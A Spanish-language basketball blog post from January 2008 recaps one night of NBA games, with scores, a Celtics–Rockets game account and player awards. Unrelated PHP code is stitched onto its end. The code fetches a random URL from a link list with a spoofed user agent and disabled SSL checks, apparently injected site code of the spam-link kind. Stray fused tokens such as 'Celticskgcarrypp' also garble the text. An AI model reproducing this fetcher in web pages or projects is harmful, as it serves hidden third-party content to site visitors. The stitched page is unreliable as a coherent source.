La (nueva) crónica

03 de January de 2008 por MagicJohnson32

Anoche se disputaron los primeros partidos del nuevo año, lo que se presenta como una excusa magnífica para estrenar crónica. La iremos perfeccionando con el tiempo pero esperamos que desde ya sea de vuestro agrado.

Resumen de la jornada: fue una noche de muchos partidos y pocas sorpresas, por no decir ninguna. Si acaso sorprendió la claridad del triunfo de los Grizzlies en el Conseco Fieldhouse, 90-72, aunque para ello ayudaron bastante la gran actuación de Gasol y una desastrosa segunda mitad de los Pacers, que sólo fueron capaces de anotar 28 puntos en 24 minutos y suman 5 derrotas consecutivas, las mismas que los Heat y los Knicks, que cayeron ante Bucks y Kings respectivamente. El peor equipo de la liga sigue siendo, sin embargo, Minnesota, que sigue plantado en 4 triunfos y elevó su cifra de derrotas hasta las 27 al caer ante Portland, que se recuperó así después de ver truncada su racha de 13 victorias. Sorprendente aunque baldía fue la batalla planteada por los Rockets en Boston, de la que más adelante hablaremos largo y tendido. Por lo demás, Detroit amplió ante los Wizards su racha de triunfos, que ya es de 10, los Mavs aplastaron a los Warriors, a los Bulls les sigue haciendo efecto el cambio de entrenador, Korver se vengó de los Sixers, los Hornets no tuvieron problemas ante los Clippers y Jason Kidd volvió a dar una lección de baloncesto, en esta ocasión para conducir la remontada y victoria de los Nets sobre los Magic. Otro que se lució fue LeBron James, con 32 puntos en la segunda mitad del partido ante los Hawks, aunque para lucimiento, el de John Salmons, nuestro particular MVP de la noche.

A continuación, los resultados de todos los partidos, con enlace a sus respectivos box-scores, y algunos detalles de lo que deparó la noche:

Resultados:

Bulls 109 – 97 Bobcats

Nets 96 – 95 Magic

Grizzlies 90 – 72 Pacers

Pistons 106 – 93 Wizards

Hawks 94 – 98 Cavs

Bucks 103 – 98 Heat

Kings 107 – 97 Knicks

Blazers 90 – 79 Wolves

Warriors 99 – 121 Mavs

Sixers 107 – 110 Jazz

Hornets 95 – 81 Clippers

El partido de la noche: Rockets 93 – 97 Celticskgcarrypp

A un buen arranque de los Rockets con un parcial de 7-2 respondieron los verdes con un parcial de 2-17 que les dejaba 9-19 en los primeros minutos. A partir de ahí los Celtics jugaron su mejor baloncesto de la noche y de la mano de un gran Pierce al comando de la 2ª unidad de Boston, llegaron a una cómoda ventaja de 20 puntos mediado el 2º cuarto. En ese momento la entrada de Bonzi Wells, ayudado por Head, dio un respiro a Houston. Al descanso el marcador estaba 53-42 y se preveían los problemas de faltas de los pívots locales. Tras el descanso salió mejor Houston y en especial Yao Ming, que en ese momento podía tanto con Perkins como con Pollard. Un gran tercer cuarto de Ming acercó a los Rockets hasta los 8 puntos de diferencia, mientras que por los Celtics Pollard, que hizo su mejor partido del año con 10 puntos, Pierce y Rondo sostenían al equipo. Acababa el cuarto con Perkins en 4 faltas y Pollard en 5. En el último cuarto, de la mano de un gran Wells y un buen Alston, los Rockets igualaron el partido e incluso se puieron por delante (81-78). Con Perkins y Pollard eliminados por faltas, Doc Rivers jugó con 4 pequeños y emparejó directamente a Garnett con Ming. Garnett se echó el equipo y al público a las espaldas y anotó 11 puntos en los últimos 7 minutos, pudiendo en todo momento, tanto en defensa como en ataque, con Yao Ming. Clin-clin, caja, y ya son 27-3. Por parte de los Rockets, que echaron de menos a T-Mac, Wells fue el mejor seguido de Alston y Ming. Más allá de sus números, con actuaciones como la de anoche Garnett se postula como candidato al MVP, anotando los tiros cruciales y tirando del equipo y la afición en los momentos mas complicados. Pierce también jugó un buen partido y mas desacertado estuvo anoche Ray Allen. Buen trabajo de los pivots sobre Ming y muy buena la dirección de juego de Rajon Rondo.

salmonsmadisonMejor jugador de la noche: como decíamos al inicio, John Salmons ha sido nuestro MVP de la pasada madrugada. Este jugador, acostumbrado a aprovechar los minutos que le llegan por lesiones de sus compañeros, fue titular ante las ausencias de Artest, Martin y Bibby y lo aprovechó para merendarse a los Knicks con 32 puntos (13 de 18 en tiros de campo, 5 de 5 en libres), 11 rebotes, 6 asistencias y 6 recuperaciones de balón en 44 minutos de juego.

El rookie de la noche: sus estadísticas no deslumbrarán a nadie pero Michael Conley marcó diferencias anoche para los Grizzlies, un equipo muy necesitado de dirección de juego. Conley no pudo tener mejor estreno como titular y condujo la victoria de Memphis en Indianapolis, en la misma cancha en la que el ex Ohio State conquistó tres títulos estatales.baronmavs

El jugador sorpresa de la noche: seguimos con los rookies, porque Noah irrumpió con 17 puntos, 6 rebotes y 4 asistencias en el triunfo de los Bulls sobre los Bobcats. Su gran actuación, que incluyó su mejor marca anotadora como profesional, llevó al nuevo entrenador de los Bulls a mantener a Noah en cancha durante todo el último cuarto. Seguro que los minutos empezarán a llegar para un jugador que no ha dispuesto de demasiadas oportunidades hasta el momento.

La decepción de la noche: los Warriors no pueden permitirse malas actuaciones de Baron Davis, y la de anoche fue especialmente mala. Ante los Mavs, el gran base angelino hizo 2 de 14 en tiros de campo con 0 de 8 en lanzamientos de dos puntos. Además, sólo atrapó dos rebotes, robó 1 balón y dio 6 asistencias, números muy debajo de los que acostumbra a firmar y, sobre todo, muy diferentes a los que logró en la eliminatoria de primera ronda de los pasados Playoffs ante Dallas. Así se entiende la abultada derrota de los Warriors en territorio texano.

Hasta aquí nuestra primera nueva crónica de la jornada. Os dejamos con las 10 mejores jugadas de la pasada madrugada:

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>